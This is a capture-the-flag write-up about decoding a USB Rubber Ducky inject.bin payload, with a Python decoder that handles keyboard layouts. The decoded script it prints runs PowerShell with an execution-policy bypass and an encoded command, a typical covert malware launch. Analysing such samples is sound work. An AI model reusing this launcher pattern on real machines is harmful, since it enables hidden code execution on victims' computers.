NDH16/Wavestone - Step 1 - Little bad duck

Challenge description

Mr Samberg: Hi Jake, thank you for agreeing to work with us.

Jake: No problem. So you're in charge around here, is that fair to say?

Mr Samberg: Absolutely, I'm the boss.

Jake: Well, in that case, I'll let you describe what happened to your company.

Mr Samberg: It looks like my boss's computer has been infected with malware. We have put our top specialists on the case. They ran every antivirus they knew of, but they found nothing. The only suspicious thing we have is an SD card that the janitor found outside of the boss's office. I've sent you the only file present on it.

Jake: I'll get started then. But wait, didn't you say you were the boss?

Your task is to analyse the file and find anything that looks interesting to you.

Solution

We were provided a file named inject.bin. The name of the challenge is a hint: the file is an encoded Rubber Ducky payload. We can use an online tool to retrieve the original script. (All of the commonly used decoding scripts failed to retrieve the payload because the script had been encoded for a French keyboard layout!)

Here is the full script:

DELAY
cmd
REM Congratz on your first flag: WAVE{b2496b42dbc8e507885221ae5853da0a}
%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ep bypass -enc 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

The first flag is WAVE{b2496b42dbc8e507885221ae5853da0a}, and we now also have the PowerShell payload; it will be useful for step 2 :)
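As an added example (not the write-up's own tooling), here is a small inject.bin decoder that takes the keyboard layout as a parameter, which is exactly what the stock decoders lacked above: the same bytes come out as "cmd" under an AZERTY table and as "c;d" under a US one. The record format (two-byte keycode/modifier pairs, keycode 0x00 marking a DELAY), the partial layout tables and the sample blob are assumptions constructed for this demo.

```python
"""Decode a USB Rubber Ducky inject.bin under a chosen keyboard layout.

Added example, not the write-up's tooling. Assumed format (classic Duck
Encoder): two-byte records [HID keycode][modifier]; keycode 0x00 marks a
DELAY whose second byte is milliseconds (chained when above 255).
"""
MOD_SHIFT, MOD_RSHIFT, MOD_GUI = 0x02, 0x20, 0x08

# Partial tables, HID usage id -> (unshifted, shifted); only keys this demo needs.
US = {0x04 + i: (c, c.upper()) for i, c in enumerate("abcdefghijklmnopqrstuvwxyz")}
US.update({0x1E + i: (c, "!@#$%^&*()"[i]) for i, c in enumerate("1234567890")})
US.update({0x2C: (" ", " "), 0x33: (";", ":"), 0x34: ("'", '"'),
           0x36: (",", "<"), 0x37: (".", ">"), 0x38: ("/", "?")})
# French AZERTY: same physical positions, different characters (constructed).
FR = dict(US)
FR.update({0x04: ("q", "Q"), 0x14: ("a", "A"), 0x1A: ("z", "Z"), 0x1D: ("w", "W"),
           0x10: (",", "?"), 0x33: ("m", "M"), 0x36: (";", "."), 0x37: (":", "/")})
FR.update({0x1E + i: (c, "1234567890"[i]) for i, c in enumerate("&é\"'(-è_çà")})
LAYOUTS = {"us": US, "fr": FR}

def decode(blob: bytes, layout: str = "us") -> list:
    """Return Ducky Script lines; consecutive typed keys merge into one STRING."""
    table, lines, text, delay = LAYOUTS[layout], [], "", 0
    def flush():                            # emit any pending DELAY, then STRING
        nonlocal text, delay
        if delay:
            lines.append(f"DELAY {delay}")
            delay = 0
        if text:
            lines.append("STRING " + text)
            text = ""
    for i in range(0, len(blob) - 1, 2):
        key, mod = blob[i], blob[i + 1]
        if key == 0x00:                     # DELAY record: accumulate milliseconds
            if text: flush()
            delay += mod
            continue
        if delay: flush()
        if key == 0x28 and mod == 0:        # ENTER
            flush(); lines.append("ENTER")
        elif mod == MOD_GUI:                # e.g. GUI r (Windows+R)
            flush(); lines.append("GUI " + table.get(key, ("?", "?"))[0])
        elif mod & ~(MOD_SHIFT | MOD_RSHIFT):   # other combos: keep them raw
            flush(); lines.append(f"KEY 0x{key:02x} MOD 0x{mod:02x}")
        else:                               # plain or shifted character
            text += table.get(key, ("?", "?"))[bool(mod)]
    flush()
    return lines

# Constructed sample: GUI r, DELAY 500, STRING cmd, ENTER, encoded on an AZERTY
# keyboard ('m' sits on HID 0x33, where a US layout has ';').
SAMPLE = bytes([0x15, 0x08, 0x00, 0xFF, 0x00, 0xF5,
                0x06, 0x00, 0x33, 0x00, 0x07, 0x00, 0x28, 0x00])

if __name__ == "__main__":
    print(decode(SAMPLE, "fr"))   # ['GUI r', 'DELAY 500', 'STRING cmd', 'ENTER']
    print(decode(SAMPLE, "us"))   # ['GUI r', 'DELAY 500', 'STRING c;d', 'ENTER']
```

For a real capture, extend the tables to the full usage-id range (and AltGr combinations for characters such as the backslash in the payload above) before trusting the decoded text.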

Author: Crypt0-M3lon @Crypt0_M3lon

Post date: 2018-06-30